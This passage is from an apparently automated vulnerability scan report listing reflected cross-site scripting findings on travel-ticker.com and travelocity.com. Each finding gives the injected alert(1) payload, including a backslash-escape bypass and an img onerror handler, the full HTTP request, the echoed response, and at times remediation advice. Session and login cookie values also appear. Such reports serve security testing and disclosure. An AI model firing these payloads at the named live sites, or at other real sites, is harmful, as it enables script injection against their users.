Cookie: JSESSIONID=ECED9449D2CCA83DC56E12B303E6219B; SaneID=ECED9449D2CCA83DC56E12B303E6219; NSC_xxx.usbwfm-ujdlfs-iuuq=ffffffffaf131c8d45525d5f4f58455e445a4a422d69

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Mon, 03 Oct 2011 00:38:13 GMT
Content-Length: 316092

<!DOCTYPE html>


<html>
<head>


<title>Travel Ticker page not found</title>

<link rel="shortcut icon" href="http://ak-static.travel-ticker.com/static/images/favico
...[SNIP]...
<script>AnalyticsSupport.addAnalyticsContextListVariable("campaign","bid:B311497");
AnalyticsSupport.addAnalyticsContextListVariable("campaign","sid:S250a90a4\\";alert(1)//3d9d3aaa825");

</script>
...[SNIP]...
4.407. http://www.travel-ticker.com/altcategory.jsp [bid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.travel-ticker.com
Path:   /altcategory.jsp

Issue detail

The value of the bid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ada81\"%3balert(1)//21cebf7bc92 was submitted in the bid parameter. This input was echoed as ada81\\";alert(1)//21cebf7bc92 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /altcategory.jsp?actionType=1&categoryType=Destination&categoryName=&sid=S250&bid=B311497ada81\"%3balert(1)//21cebf7bc92 HTTP/1.1
Host: www.travel-ticker.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trip.com/hotels.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Mon, 03 Oct 2011 00:38:50 GMT
Content-Length: 316092

<!DOCTYPE html>


<html>
<head>


<title>Travel Ticker page not found</title>

<link rel="shortcut icon" href="http://ak-static.travel-ticker.com/static/images/favico
...[SNIP]...
<script>AnalyticsSupport.addAnalyticsContextListVariable("campaign","bid:B311497ada81\\";alert(1)//21cebf7bc92");
AnalyticsSupport.addAnalyticsContextListVariable("campaign","sid:S250");

</script>
...[SNIP]...
4.408. http://www.travel-ticker.com/altcategory.jsp [categoryName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.travel-ticker.com
Path:   /altcategory.jsp

Issue detail

The value of the categoryName request parameter is copied into the HTML document as plain text between tags. The payload aa60f<img%20src%3da%20onerror%3dalert(1)>bafc79ce56a was submitted in the categoryName parameter. This input was echoed as aa60f<img src=a onerror=alert(1)>bafc79ce56a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /altcategory.jsp?actionType=1&categoryType=Destination&categoryName=aa60f<img%20src%3da%20onerror%3dalert(1)>bafc79ce56a&sid=S250&bid=B311497 HTTP/1.1
Host: www.travel-ticker.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trip.com/hotels.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Set-Cookie: hotwireLogin=V4XFi9mFuQsCCPy6V/qhrdIccYJFHrJxloNL+OGc4tZkfjnIHGhTi7ltrG1IPXfIeO+uyJQdNdBMLRhhG2FHTMgXg79d4ve0wj4co6fHPBw/6XrC+I2V0VAJjgDrxtP6UCZQAzRZKNmqg6s3BNNiMzoqSlE+9QLVq8LlP5r5sVC9LqYt6r1WejbBqGtX4/QeMydTsx5XDmME0qOPB8zW5aGoplccEyUVyAQw1zoB77fdKkw2wifeN3QXc3uxCTtpmp1Xbz0DxcS4cKS1iGZ7tDS9ulFNeBvx/qJTKhJwy7rJEih5XSyT1Fco8d5rZFOYJfrLMMzpj5kMJEILR9qBNRDl+42pRMtKzavwDRm7Zn4S+YVpyXk9PjDFsc8boH4pNL/i/1SO3SnXZq06Bmb1cMu94wvBIzddV6cWSVnTSkb6zEWjyhKcj/R/L14UAfRNxKLA1dwarM4dx9zfvTJdnTQ5OD8cXu1QsRQx6bhBdHgkaVvI7Yv0CzgZubBDGYZ2py/gVN6nUboAKdWWhnH1+SCb4zGbUyOIkF4m3Q5L+mHwtRpnviW5iB6TzG4qM3vCGJzuO/q61vTeJmSjVVzx75u8crr6cftWqHj6w1ad2e3Pf5CFEtJtPeidw2FziNaUnrZUO8Dg4khW7hU9cY7J7fKZ4GRKCUFiaqRBwocDhg2nL+BU3qdRuu3nLjE0iKGkecN3QDSwuy2hpe08Csu2fupUbvdFv0Cs+iPYTYOKXR36I9hNg4pdHfoj2E2Dil0d+iPYTYOKXR36I9hNg4pdHZkXMwFjN5//GfFEXccZLnT2PYbFZdaEFPoj2E2Dil0d+iPYTYOKXR3xaDbBCC31sHTjDoMisTPw+iPYTYOKXR1PInMvNwnP4qWAQ5Fqf/sURmHo2YOoPtSM+3JgIIVvgfoj2E2Dil0dfPSXg9UVFkdonRAnD1CzZSScdfGLoqChRdyjkfXmqOcml0c5X6k8GJajsUKRNqS+Ouz/Wdyu4BraAnioKq60T50C0CrKKvKOkVbI7P1I/pc=; Expires=Tue, 02-Oct-2012 00:38:37 GMT; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Mon, 03 Oct 2011 00:38:36 GMT
Content-Length: 316277

<!DOCTYPE html>


<html>
<head>


<title>Travel Ticker</title>

<link rel="shortcut icon" href="http://ak-static.travel-ticker.com/static/images/favicon.ico?ver=20765
...[SNIP]...
<p>aa60f<img src=a onerror=alert(1)>bafc79ce56a travel deals handpicked for you</p>
...[SNIP]...
4.409. http://www.travelocity.com/popWindow2 [dest parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.travelocity.com
Path:   /popWindow2

Issue detail

The value of the dest request parameter is copied into an HTML comment. The payload 97cd3--><script>alert(1)</script>303ba927549 was submitted in the dest parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS97cd3--><script>alert(1)</script>303ba927549&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway= HTTP/1.1
Host: www.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/472a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; TVLY_LOCALE=us; mbox=check#true#1317600542|session#1317600481056-80236#1317602342|PC#1317600481056-80236.19#1318810083; IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998; popunder=yes; __utma=97304794.100809678.1317600495.1317600495.1317600495.1; __utmb=97304794.2.9.1317600523363; __utmc=97304794; __utmz=97304794.1317600495.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:09:29 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 9556
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!-- Vignette V6 Sun Oct 02 19:09:29 2011 -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><!-- <logit>|~||DM||||~|</logit> -->


...[SNIP]...
<!--
               drfad
               adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a
               travelers=1
               destination=BOS97CD3--><SCRIPT>ALERT(1)</SCRIPT>303BA927549
               dateDisplayFormat=mm/dd/yyyy
               departureDate=yyyymmdd
                   
           -->
...[SNIP]...
4.410. http://www.travelocity.com/popWindow2 [fromDate parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.travelocity.com
Path:   /popWindow2

Issue detail

The value of the fromDate request parameter is copied into an HTML comment. The payload f4e6a--><script>alert(1)</script>36ba60a1a8 was submitted in the fromDate parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=ddf4e6a--><script>alert(1)</script>36ba60a1a8&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway= HTTP/1.1
Host: www.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/472a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; TVLY_LOCALE=us; mbox=check#true#1317600542|session#1317600481056-80236#1317602342|PC#1317600481056-80236.19#1318810083; IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998; popunder=yes; __utma=97304794.100809678.1317600495.1317600495.1317600495.1; __utmb=97304794.2.9.1317600523363; __utmc=97304794; __utmz=97304794.1317600495.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:09:09 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 9555
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!-- Vignette V6 Sun Oct 02 19:09:09 2011 -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><!-- <logit>|~||DM||||~|</logit> -->


...[SNIP]...
<!--
               drfad
               adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a
               travelers=1
               destination=BOS
               dateDisplayFormat=mm/dd/yyyy
               departureDate=yyyymmddf4e6a--><script>alert(1)</script>36ba60a1a8
                   
           -->
...[SNIP]...
4.411. http://www.travelocity.com/popWindow2 [fromMonth parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.travelocity.com
Path:   /popWindow2

Issue detail

The value of the fromMonth request parameter is copied into an HTML comment. The payload b5b8c--><script>alert(1)</script>708d11813dd was submitted in the fromMonth parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mmb5b8c--><script>alert(1)</script>708d11813dd&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway= HTTP/1.1
Host: www.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/472a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; TVLY_LOCALE=us; mbox=check#true#1317600542|session#1317600481056-80236#1317602342|PC#1317600481056-80236.19#1318810083; IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998; popunder=yes; __utma=97304794.100809678.1317600495.1317600495.1317600495.1; __utmb=97304794.2.9.1317600523363; __utmc=97304794; __utmz=97304794.1317600495.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:10:02 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 9556
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!-- Vignette V6 Sun Oct 02 19:10:02 2011 -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><!-- <logit>|~||DM||||~|</logit> -->


...[SNIP]...
<!--
               drfad
               adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a
               travelers=1
               destination=BOS
               dateDisplayFormat=mm/dd/yyyy
               departureDate=yyyymmb5b8c--><script>alert(1)</script>708d11813dddd
                   
           -->
...[SNIP]...
4.412. http://www.travelocity.com/popWindow2 [fromYear parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.travelocity.com
Path:   /popWindow2

Issue detail

The value of the fromYear request parameter is copied into an HTML comment. The payload a88ca--><script>alert(1)</script>b1769152bab was submitted in the fromYear parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyya88ca--><script>alert(1)</script>b1769152bab&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway= HTTP/1.1
Host: www.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/472a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; TVLY_LOCALE=us; mbox=check#true#1317600542|session#1317600481056-80236#1317602342|PC#1317600481056-80236.19#1318810083; IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998; popunder=yes; __utma=97304794.100809678.1317600495.1317600495.1317600495.1; __utmb=97304794.2.9.1317600523363; __utmc=97304794; __utmz=97304794.1317600495.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:09:17 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 9556
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!-- Vignette V6 Sun Oct 02 19:09:17 2011 -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><!-- <logit>|~||DM||||~|</logit> -->


...[SNIP]...
<!--
               drfad
               adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a
               travelers=1
               destination=BOS
               dateDisplayFormat=mm/dd/yyyy
               departureDate=yyyya88ca--><script>alert(1)</script>b1769152babmmdd
                   
           -->
...[SNIP]...
4.413. http://www.travelocity.com/popWindow2 [noOfAdults parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.travelocity.com
Path:   /popWindow2

Issue detail

The value of the noOfAdults request parameter is copied into an HTML comment. The payload 3d5a4--><script>alert(1)</script>d556c19d909 was submitted in the noOfAdults parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=13d5a4--><script>alert(1)</script>d556c19d909&service=TRAVELOCITY&oneway= HTTP/1.1
Host: www.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/472a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; TVLY_LOCALE=us; mbox=check#true#1317600542|session#1317600481056-80236#1317602342|PC#1317600481056-80236.19#1318810083; IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998; popunder=yes; __utma=97304794.100809678.1317600495.1317600495.1317600495.1; __utmb=97304794.2.9.1317600523363; __utmc=97304794; __utmz=97304794.1317600495.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:09:38 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 9556
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!-- Vignette V6 Sun Oct 02 19:09:38 2011 -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><!-- <logit>|~||DM||||~|</logit> -->


...[SNIP]...
<!--
               drfad
               adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a
               travelers=13d5a4--><script>alert(1)</script>d556c19d909
               destination=BOS
               dateDisplayFormat=mm/dd/yyyy
               departureDate=yyyymmdd
                   
           -->
...[SNIP]...
4.414. http://www.travelocity.com/popWindow2 [toDate parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.travelocity.com
Path:   /popWindow2

Issue detail

The value of the toDate request parameter is copied into an HTML comment. The payload d7b6d--><script>alert(1)</script>c27dd7fe78e was submitted in the toDate parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=ddd7b6d--><script>alert(1)</script>c27dd7fe78e&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway= HTTP/1.1
Host: www.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/472a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; TVLY_LOCALE=us; mbox=check#true#1317600542|session#1317600481056-80236#1317602342|PC#1317600481056-80236.19#1318810083; IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998; popunder=yes; __utma=97304794.100809678.1317600495.1317600495.1317600495.1; __utmb=97304794.2.9.1317600523363; __utmc=97304794; __utmz=97304794.1317600495.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:09:17 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 9575
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!-- Vignette V6 Sun Oct 02 19:09:17 2011 -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><!-- <logit>|~||DM||||~|</logit> -->


...[SNIP]...
<!--
               drfad
               adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a
               travelers=1
               destination=BOS
               dateDisplayFormat=mm/dd/yyyy
               departureDate=yyyymmdd
               returnDate=yyyymmddd7b6d--><script>alert(1)</script>c27dd7fe78e    
           -->
...[SNIP]...
4.415. http://www.travelocity.com/popWindow2 [toMonth parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.travelocity.com
Path:   /popWindow2

Issue detail

The value of the toMonth request parameter is copied into an HTML comment. The payload 9d4b7--><script>alert(1)</script>bbc12be6325 was submitted in the toMonth parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm9d4b7--><script>alert(1)</script>bbc12be6325&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway= HTTP/1.1
Host: www.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/472a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; TVLY_LOCALE=us; mbox=check#true#1317600542|session#1317600481056-80236#1317602342|PC#1317600481056-80236.19#1318810083; IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998; popunder=yes; __utma=97304794.100809678.1317600495.1317600495.1317600495.1; __utmb=97304794.2.9.1317600523363; __utmc=97304794; __utmz=97304794.1317600495.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:10:11 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 9575
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!-- Vignette V6 Sun Oct 02 19:10:11 2011 -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><!-- <logit>|~||DM||||~|</logit> -->


...[SNIP]...
<!--
               drfad
               adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a
               travelers=1
               destination=BOS
               dateDisplayFormat=mm/dd/yyyy
               departureDate=yyyymmdd
               returnDate=yyyymm9d4b7--><script>alert(1)</script>bbc12be6325dd    
           -->
...[SNIP]...
4.416. http://www.travelocity.com/popWindow2 [toYear parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.travelocity.com
Path:   /popWindow2

Issue detail

The value of the toYear request parameter is copied into an HTML comment. The payload c880d--><script>alert(1)</script>e0acc4fd6b7 was submitted in the toYear parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyyc880d--><script>alert(1)</script>e0acc4fd6b7&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway= HTTP/1.1
Host: www.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/472a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; TVLY_LOCALE=us; mbox=check#true#1317600542|session#1317600481056-80236#1317602342|PC#1317600481056-80236.19#1318810083; IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998; popunder=yes; __utma=97304794.100809678.1317600495.1317600495.1317600495.1; __utmb=97304794.2.9.1317600523363; __utmc=97304794; __utmz=97304794.1317600495.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:09:23 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 9575
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!-- Vignette V6 Sun Oct 02 19:09:23 2011 -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><!-- <logit>|~||DM||||~|</logit> -->


...[SNIP]...
<!--
               drfad
               adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a
               travelers=1
               destination=BOS
               dateDisplayFormat=mm/dd/yyyy
               departureDate=yyyymmdd
               returnDate=yyyyc880d--><script>alert(1)</script>e0acc4fd6b7mmdd    
           -->
...[SNIP]...
4.417. http://www.travelocity.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/adserver.js [pubid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.travelocity.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/adserver.js

Issue detail

The value of the pubid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9eea4"%3balert(1)//0a881cfe5b9 was submitted in the pubid parameter. This input was echoed as 9eea4";alert(1)//0a881cfe5b9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

